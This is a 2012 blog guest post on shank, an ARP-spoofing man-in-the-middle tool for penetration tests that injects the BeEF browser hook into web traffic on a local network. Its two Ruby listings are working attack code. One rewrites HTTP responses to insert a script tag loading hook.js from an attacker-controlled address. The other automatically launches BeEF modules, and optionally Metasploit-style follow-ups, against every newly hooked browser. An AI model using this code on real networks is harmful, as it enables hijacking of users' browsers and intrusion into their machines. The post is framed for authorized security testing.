Monday, December 31, 2012

BeEF Shank - BeEF MitM for Pentests

Happy New Year, everyone!

This guest post is brought to you by Ryan Linn.

At the Black Hat Briefings this past summer, Steve Ocepek and I released Ruby code to help people who want to use BeEF on internal penetration tests. Some may wonder why you would want to do that. More and more internal resources are moving to SharePoint, internal tools are moving to web-based intranet sites, and personal information is moving away from mainframes and thick clients into web clients with database back-ends. Being able to attack the browser effectively on internal tests is going to become crucial to giving realistic feedback on the potential impact of an intrusion.

So our goal at Black Hat this year was to demonstrate how to effectively use the browser as a foothold on the machines of a local network. We created two tools to help use BeEF effectively on internal tests. The first is a tool called shank. Shank is an ARP spoofing tool used to execute smarter Man-in-the-Middle (MITM) attacks that inject the BeEF hook into browsers surfing on the network.

Shank has two distinct parts. The first is the MITM engine, which begins by ARP spoofing the local network. Once the network has been successfully poisoned, shank polls the local BeEF instance to determine which browsers are already hooked. If shank sees a web response destined for a poisoned client that BeEF hasn't already hooked, it inserts the BeEF hook into that response. Once the browser is hooked, shank won't inject into another response for that client until BeEF reports the hook as lost. This ensures that as long as the browser is actively browsing the web, it stays hooked by shank.
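
The rewrite decision described above, as an added example in Ruby. This is not shank's own code: shank operates on packets it has ARP spoofed into the path, while this example works on one complete HTTP response at the message level, takes the set of hooked client IPs as input (the result of polling BeEF), and assumes the BeEF address in `BEEF_HOOK_URL`. It also shows the checks a practitioner needs before editing a response in place: only uncompressed, non-chunked HTML is touched, and Content-Length is corrected so the browser does not truncate the page.

```ruby
require 'set'

# Added example, not shank's own code. The BeEF hook address is an assumption;
# point it at your own BeEF instance.
BEEF_HOOK_URL = 'http://192.168.56.10:3000/hook.js'
HOOK_TAG = %(<script src="#{BEEF_HOOK_URL}"></script>)

# raw_response: full HTTP response (headers + body) headed for client_ip
# hooked_ips:   IPs BeEF currently reports as hooked (refreshed by polling)
# Returns the response to forward: rewritten with the hook, or untouched.
def inject_hook(raw_response, client_ip, hooked_ips)
  # Already hooked: leave the page alone so the existing hook stays in place.
  return raw_response if hooked_ips.include?(client_ip)

  head, sep, body = raw_response.partition("\r\n\r\n")
  return raw_response if sep.empty?          # no header/body boundary
  headers = head.split("\r\n")

  # Only plain, uncompressed, non-chunked HTML is safe to edit in place.
  ctype = headers.find { |h| h =~ /\Acontent-type:/i }
  return raw_response unless ctype && ctype =~ %r{text/html}i
  return raw_response if headers.any? { |h| h =~ /\Acontent-encoding:/i }
  return raw_response if headers.any? { |h| h =~ /\Atransfer-encoding:\s*chunked/i }

  # Prefer </head> so the hook loads before page scripts; fall back to </body>.
  new_body =
    if body =~ %r{</head>}i
      body.sub(%r{</head>}i) { |m| HOOK_TAG + m }
    elsif body =~ %r{</body>}i
      body.sub(%r{</body>}i) { |m| HOOK_TAG + m }
    else
      body + HOOK_TAG
    end

  # The body grew, so Content-Length must follow or the browser will cut the
  # page off (or wait forever) at the old length.
  new_headers = headers.map do |h|
    h =~ /\Acontent-length:/i ? "Content-Length: #{new_body.bytesize}" : h
  end
  new_headers.join("\r\n") + sep + new_body
end
```

Gzip-encoded or chunked responses are deliberately passed through unmodified; a real in-path tool either strips Accept-Encoding from the client's request so the server answers in plaintext, or decompresses and re-encodes, both of which are outside this example.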

So where do we go from here? Once we have a browser hooked, we want to get as much information as we can from it. BeEF lets us auto-run one module for each browser, but what if we want to do a large amount of fingerprinting on every browser we hook? This is where autorun.rb comes in. For each browser we hook, autorun.rb checks whether this is a new hook. If it is, we have an array of modules that we want to run against that browser.

These modules can do anything from figuring out which versions of Java and Flash are running to enumerating all the interfaces on a machine, which tells us whether a VPN session is active or whether the host is multi-homed. Since this is all in Ruby, additional logic can be layered on top of those fingerprints, such as auto-launching Metasploit modules or other attacks based on the Flash version or the presence of VPN interfaces. This extends BeEF through external triggers, thanks to Michele's REST API.
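
The autorun loop from the last two paragraphs, sketched as an added example in Ruby. This is not the autorun.rb released with the talk. It assumes the BeEF REST API paths `/api/hooks`, `/api/modules` and `/api/modules/:session/:id` with a `token` query parameter and the JSON shapes noted in the comments (check them against your BeEF version), and the module names passed in are placeholders for whatever names your `/api/modules` listing reports. HTTP is abstracted behind a `transport` callable so the same logic can run against a live BeEF or against constructed replies.

```ruby
require 'json'
require 'set'

# Added example, not the autorun.rb from the talk. Runs a fixed list of BeEF
# modules against each browser the first time it shows up as hooked, then
# hands the browser record to an optional reaction callback.
class AutoRunner
  # token:     BeEF REST API token (from /api/admin/login)
  # modules:   BeEF module names to run on every new hook, in order
  # transport: callable (method, path, body) -> parsed JSON reply
  # react:     optional callable given the browser record after the modules
  #            are launched; this is where version- or interface-based logic
  #            (e.g. kicking off an MSF module) would hang
  def initialize(token:, modules:, transport:, react: nil)
    @token = token
    @wanted = modules
    @transport = transport
    @react = react
    @seen = Set.new   # sessions already fingerprinted
    @ids = nil        # module name -> numeric id, resolved once
  end

  # Resolve names to ids from GET /api/modules. Assumed reply shape:
  # {"0": {"id": 12, "name": "..."}, "1": {...}, ...}
  def module_ids
    @ids ||= begin
      listing = @transport.call(:get, "/api/modules?token=#{@token}", nil)
      by_name = {}
      listing.each_value { |m| by_name[m['name']] = m['id'] }
      missing = @wanted - by_name.keys
      raise "unknown BeEF modules: #{missing.join(', ')}" unless missing.empty?
      @wanted.map { |n| [n, by_name[n]] }.to_h
    end
  end

  # One polling pass. Assumed /api/hooks reply shape:
  # {"hooked-browsers": {"online": {"0": {"session": "...", "ip": "...",
  #   "name": "...", "version": "...", "os": "..."}}, "offline": {...}}}
  # Returns [[session, module_name, command_id], ...] for modules launched
  # this pass; an empty array when nothing new has hooked.
  def poll
    hooks = @transport.call(:get, "/api/hooks?token=#{@token}", nil)
    online = hooks.fetch('hooked-browsers', {}).fetch('online', {})
    launched = []
    online.each_value do |browser|
      session = browser['session']
      next if @seen.include?(session)   # fingerprint each hook only once
      @seen << session
      module_ids.each do |name, id|
        reply = @transport.call(:post,
                                "/api/modules/#{session}/#{id}?token=#{@token}",
                                {})
        launched << [session, name, reply['command_id']]
      end
      @react.call(browser) if @react
    end
    launched
  end
end
```

In use, `poll` would be called on a timer; results of each launched command are fetched separately by command id and fed back into the reaction logic, which is where the "auto-launch something based on the Flash version" behaviour lives.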

Leveraging these tools can greatly enhance your internal penetration tests; this is a proof of concept to help with internal tests. If you want to try any of this out for yourself, you can get the code on GitHub. I also encourage you to check out the whitepaper.

If you have any suggestions for other things to add to BeEF, feel free to add them to our feature tracker and we'll take a shot. If you'd like to help out with BeEF, let us know!


  1. Hi, great stuff!

    I was wondering whether this type of attack could be integrated into BeEF?

